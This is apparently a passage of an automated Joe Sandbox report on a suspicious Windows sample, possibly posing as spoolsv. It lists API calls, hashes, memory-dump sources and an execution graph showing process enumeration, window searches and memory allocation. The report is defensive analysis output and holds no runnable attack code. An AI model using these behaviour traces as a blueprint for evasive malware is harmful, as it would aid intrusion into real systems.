                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167344118-0
                                                                                                        • Opcode ID: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                                                                        • Instruction ID: 1176041c58d3c6c4e80ae864809d48ff9bb0580384c2a0d59c617645fccee574
                                                                                                        • Opcode Fuzzy Hash: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                                                                        • Instruction Fuzzy Hash: 2FB009D4A922307CB90433B2EC0BE3F211CAC9470A7C48A8E7500E2086DC7DA822807E
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                                                                        • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                                                                        • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PR$ SE$4$W
                                                                                                        • API String ID: 0-2834725127
                                                                                                        • Opcode ID: cc2ab1422b48e366c2156ab7bf504be634b04cadd4cdc41852e91440b3b62cc4
                                                                                                        • Instruction ID: de84d66766f4911dbb4cb6dd5687d3048455578843a01c8ac6cd267dfc716551
                                                                                                        • Opcode Fuzzy Hash: cc2ab1422b48e366c2156ab7bf504be634b04cadd4cdc41852e91440b3b62cc4
                                                                                                        • Instruction Fuzzy Hash: C0F1FAB1901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF59
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RO$C$Once$Start
                                                                                                        • API String ID: 0-2962527757
                                                                                                        • Opcode ID: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                                                                        • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                                                                        • Opcode Fuzzy Hash: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                                                                        • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                        • String ID: yyyy
                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                        • Opcode ID: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                                                                        • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                                                                        • Opcode Fuzzy Hash: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                                                                        • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                        • String ID: yyyy
                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                        • Opcode ID: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                                                                        • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                                                                        • Opcode Fuzzy Hash: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                                                                        • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                        • API String ID: 0-1311169778
                                                                                                        • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                        • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                                                                        • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                        • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:206
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 24847 4e741c 24859 4e7424 24847->24859 24848 4e77c8 24922 4254d0 11 API calls 24848->24922 24850 4e77e5 24923 425be0 SysFreeString 24850->24923 24852 4e77f5 24924 425be0 SysFreeString 24852->24924 24853 4e75ba 24890 471e9c 32 API calls 24853->24890 24855 4e7802 24925 426c24 13 API calls 24855->24925 24856 4e74bd 24914 471e9c 32 API calls 24856->24914 24859->24848 24859->24856 24864 4e7561 24859->24864 24860 4e7810 24861 4e75d5 24891 471e9c 32 API calls 24861->24891 24864->24853 24869 4e75a1 FindWindowW 24864->24869 24865 4e74d8 24867 4cf5c8 18 API calls 24865->24867 24866 4e75f0 24892 471e9c 32 API calls 24866->24892 24868 4e74e4 24867->24868 24868->24848 24872 4cf628 18 API calls 24868->24872 24869->24848 24871 4e75b3 24869->24871 24871->24848 24880 4e7506 24872->24880 24873 4e760c 24893 4cf5c8 24873->24893 24875 4e7556 CloseHandle 24875->24848 24876 4e7618 24877 4e76c8 EnumWindows 24876->24877 24898 4cf628 24876->24898 24882 4e76de 24877->24882 24880->24875 24883 4e7541 24880->24883 24915 471e9c 32 API calls 24880->24915 24916 4cf648 24880->24916 24881 4e76c2 CloseHandle 24881->24877 24882->24848 24921 4e02c8 54 API calls 24882->24921 24883->24875 24885 4e763a 24885->24881 24888 4cf648 18 API calls 24885->24888 24903 471e9c 32 API calls 24885->24903 24904 425c04 24885->24904 24888->24885 24890->24861 24891->24866 24892->24873 24926 4cf34c 24893->24926 24896 4cf5d7 CreateToolhelp32Snapshot 24896->24876 24897 4cf5e2 24897->24876 24899 4cf34c 17 API calls 24898->24899 24900 4cf633 24899->24900 24901 4cf637 Process32FirstW 24900->24901 24902 4cf642 24900->24902 24901->24885 24902->24885 24903->24885 24905 425bc8 24904->24905 24906 425c0c 24904->24906 24908 425bce SysFreeString 24905->24908 24909 425bdc 24905->24909 24906->24905 24907 425c17 SysReAllocStringLen 24906->24907 24910 425c27 24907->24910 24911 425b98 24907->24911 24908->24909 24909->24885 24910->24885 24912 4261f4 24911->24912 24913 4261de SysAllocStringLen 24911->24913 24912->24885 24913->24911 24913->24912 24914->24865 24915->24880 24917 4cf34c 17 API calls 24916->24917 24918 4cf653 24917->24918 24919 4cf657 Process32NextW 24918->24919 24920 4cf662 24918->24920 24919->24880 24920->24880 24921->24882 24922->24850 24923->24852 24924->24855 24925->24860 24927 4cf35b GetModuleHandleA 24926->24927 24929 4cf490 24926->24929 24928 4cf370 16 API calls 24927->24928 24927->24929 24928->24929 24929->24896 24929->24897 24930 564640 24932 56464d VirtualAlloc 24930->24932 24933 6d8a4b 24935 6d8a50 24933->24935 24938 564678 24935->24938 24939 564685 24938->24939 24940 5646f6 032D3B1D 032D3B02 24939->24940 24941 564812 24939->24941 24947 564735 24940->24947 24942 564718 032D3B1D 24943 564727 032D3A76 24942->24943 24942->24947 24943->24947 24944 564793 24949 4250a4 24944->24949 24945 564752 032D3B02 24945->24947 24946 564761 032D3B02 24946->24947 24947->24942 24947->24944 24947->24945 24947->24946 24950 4250ea 24949->24950 24951 425163 24950->24951 24952 425310 24950->24952 24963 425034 24951->24963 24955 425344 24952->24955 24958 425355 24952->24958 24969 425284 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 24955->24969 24957 42534e 24957->24958 24959 42539a FreeLibrary 24958->24959 24960 4253be 24958->24960 24959->24958 24961 4253c7 24960->24961 24962 4253cd ExitProcess 24960->24962 24961->24962 24964 425049 24963->24964 24965 42507f 24963->24965 24964->24965 24970 423a80 24964->24970 24976 426cc4 24964->24976 24980 427860 24964->24980 24965->24941 24969->24957 24971 423aa0 24970->24971 24972 423a88 24970->24972 24971->24964 24986 42342c 24972->24986 24973 423a90 24973->24971 24997 423bb4 11 API calls 24973->24997 24977 426cd4 GetModuleFileNameA 24976->24977 24978 426cf0 24976->24978 25062 426f58 GetModuleFileNameA RegOpenKeyExA 24977->25062 24978->24964 24981 427871 24980->24981 24982 4278a2 24980->24982 24981->24982 25081 426d0c 24981->25081 24982->24964 24987 423443 24986->24987 24988 42343e 24986->24988 24990 423470 RtlEnterCriticalSection 24987->24990 24991 42347a 24987->24991 24994 42344f 24987->24994 24998 422bd0 RtlInitializeCriticalSection 24988->24998 24990->24991 24991->24994 25005 4232e4 24991->25005 24994->24973 24995 4235c7 24995->24973 24996 4235bd RtlLeaveCriticalSection 24996->24995 24997->24971 24999 422bf5 RtlEnterCriticalSection 24998->24999 25000 422bff 24998->25000 24999->25000 25001 422c1d LocalAlloc 25000->25001 25004 422c37 25001->25004 25002 422c97 25002->24987 25003 422c8d RtlLeaveCriticalSection 25003->25002 25004->25002 25004->25003 25008 4232fb 25005->25008 25006 42333c 25010 423363 25006->25010 25016 42307c 25006->25016 25008->25006 25008->25010 25011 42324c 25008->25011 25010->24995 25010->24996 25020 422950 25011->25020 25013 42325c 25014 423269 25013->25014 25027 4231c0 9 API calls 25013->25027 25014->25008 25017 423117 25016->25017 25018 4230a1 25016->25018 25017->25018 25036 422fc0 25017->25036 25018->25010 25021 42296e 25020->25021 25022 42297c 25021->25022 25025 4229dc 25021->25025 25028 422630 25021->25028 25034 4224e4 LocalAlloc 25021->25034 25022->25013 25035 42270c VirtualFree 25025->25035 25027->25014 25029 42263f 25028->25029 25030 42268f 25029->25030 25031 422454 LocalAlloc 25029->25031 25030->25021 25032 422678 25031->25032 25032->25030 25033 42267c VirtualFree 25032->25033 25033->25030 25034->25021 25035->25022 25038 422fd4 25036->25038 25037 423070 25037->25018 25038->25037 25039 423022 25038->25039 25040 42300c 25038->25040 25042 422b3c 3 API calls 25039->25042 25049 422b3c 25040->25049 25043 423020 25042->25043 25043->25037 25059 422e80 9 API calls 25043->25059 25045 423043 25046 423065 25045->25046 25060 422ee0 9 API calls 25045->25060 25061 42256c LocalAlloc 25046->25061 25050 422b66 25049->25050 25058 422bc3 25049->25058 25051 422894 VirtualFree 25050->25051 25052 422b77 25051->25052 25053 4224e4 LocalAlloc 25052->25053 25054 422b87 25053->25054 25055 42270c VirtualFree 25054->25055 25056 422b9e 25054->25056 25055->25056 25057 42256c LocalAlloc 25056->25057 25056->25058 25057->25058 25058->25043 25059->25045 25060->25046 25061->25037 25063 426fda 25062->25063 25064 426f9a RegOpenKeyExA 25062->25064 25080 426d80 12 API calls 25063->25080 25064->25063 25065 426fb8 RegOpenKeyExA 25064->25065 25065->25063 25067 427063 lstrcpyn GetThreadLocale GetLocaleInfoA 25065->25067 25069 427193 25067->25069 25070 42709a 25067->25070 25068 426fff RegQueryValueExA 25071 42703d RegCloseKey 25068->25071 25072 42701f RegQueryValueExA 25068->25072 25069->24978 25070->25069 25074 4270aa lstrlen 25070->25074 25071->24978 25072->25071 25075 4270c3 25074->25075 25075->25069 25076 4270f1 lstrcpyn LoadLibraryExA 25075->25076 25077 42711d 25075->25077 25076->25077 25077->25069 25078 427127 lstrcpyn LoadLibraryExA 25077->25078 25078->25069 25079 42715d lstrcpyn LoadLibraryExA 25078->25079 25079->25069 25080->25068 25082 426d20 25081->25082 25084 426d3c LoadStringA 25081->25084 25083 426cc4 30 API calls 25082->25083 25082->25084 25083->25084 25085 42559c 25084->25085 25090 425570 23 API calls 25085->25090 25087 4255ac 25091 4254ac 11 API calls 25087->25091 25089 4255c4 25089->24982 25090->25087 25091->25089 25092 42545e 25093 423a80 23 API calls 25092->25093 25094 425476 CreateThread 25093->25094 25095 425428 25094->25095 25096 425430 25095->25096 25099 423ab0 25096->25099 25100 423ab5 25099->25100 25101 423ac8 25099->25101 25100->25101 25103 423bb4 11 API calls 25100->25103 25103->25101 25104 4fd3a0 GetTickCount 25105 4fd3b4 Sleep 25104->25105 25106 4fd3c3 25105->25106 25106->25105 25107 4fd3de GetTickCount 25106->25107 25108 4fd402 25107->25108 25108->25106

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                        • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                        • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                        • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                                                                        • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                        • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                        • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                        • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                                                                        • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
